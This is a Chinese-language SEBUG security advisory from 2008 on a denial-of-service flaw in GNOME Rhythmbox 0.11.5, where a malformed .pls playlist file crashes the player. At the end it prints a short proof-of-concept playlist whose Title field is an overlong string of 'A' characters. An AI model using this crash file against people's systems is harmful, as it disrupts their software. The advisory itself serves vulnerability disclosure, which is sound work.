GNOME Rhythmbox畸形播放列表文件拒绝服务漏洞
发布时间(Published):2008-06-26
SBEUGID:SEBUG-20080713527
影响版本(Vulnerable):
GNOME Rhythmbox 0.11.5
漏洞描述(Discription):
BUGTRAQ ID: 29958

Rhythmbox是GNOME桌面环境中默认的音乐播放及管理软件。

Rhythmbox处理畸形格式的播放列表文件时存在漏洞,如果用户使用Rhythmbox加载了畸形的播放列表文件(pls)的话,就会导致播放器出现段访问错误而崩溃。
<* 参考(References)
Juan Pablo Lopez Yacubian (jplopezy@gmail.com

http://marc.info/?l=bugtraq&m=121449276129382&w=2
*>
SEBUG安全建议(solution):

GNOME
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.gnome.org/

测试方法(Exploit):
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
[playlist]

X-GNOME-Title=

Title= A * 1475

NumberOfEntries=0
// Sebug.net [ 2008-07-03 ]

Home | Submit Info | Lib | Help | Forum | Partners
Copyright © 2006-2008 SEBUG Security Database. All rights Reserved
鄂ICP备05024839号